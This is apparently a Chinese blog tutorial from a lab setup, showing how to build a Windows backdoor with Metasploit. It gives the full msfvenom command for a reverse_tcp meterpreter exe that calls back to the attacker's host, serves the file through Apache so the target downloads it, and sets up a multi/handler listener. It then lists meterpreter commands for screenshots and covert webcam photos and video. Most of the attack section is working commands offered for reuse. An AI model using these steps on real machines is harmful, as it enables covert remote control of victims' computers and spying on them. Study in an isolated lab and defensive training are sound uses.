Msf之内网渗透生成Windows后门

此资料仅支持学习参考

实验原理: Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。
攻击者: kali-linux 192.168.31.130
靶机: Windows7 192.168.31.134

Windows后门:

在kali-linux上进行操作

生成exe木马文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.130 lport=5555 -f exe -o /var/www/html/payload.exe

(端口号自己随便写,/var/www/html这个是apache服务的路径,因为后面要使用apache服务把木马文件传输到靶机)
注:创建不成功,权限不够的话,可以先使用sudo su命令进入root模式再生成文件。

打开apache服务

service apache2 start

在这里插入图片描述

在Windows7上操作
打开浏览器,在地址栏输入攻击者ip 192.168.31.130
在这里插入图片描述

在kali-linux上进行操作
使用meterpreter

msfconsole

在这里插入图片描述输入各种参数配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.130
set lport 5555
run

在这里插入图片描述
返回Windows7
运行下载的木马文件

双击下载的文件,点击运行,无图形界面产生

在这里插入图片描述
在kali-linux上进行操作

返回攻击机,这时已经建立会话

抓取Windows7屏幕

screenshot


屏幕已截取,文件保存在这个位置
在这里插入图片描述

在这里插入图片描述结束会话

exit

meterpreter还有以下命令及参数:
webcam_list 查看摄像头
webcam_snap通过摄像头拍照
webcam _ stream 通过摄像头开启视频
-h :显示帮助。
-i :要使用的网络摄像头的索引号。
-p :JPEG 图像文件路径。默认 HOME /随机乱码名. jpeg 。

评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kicock.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值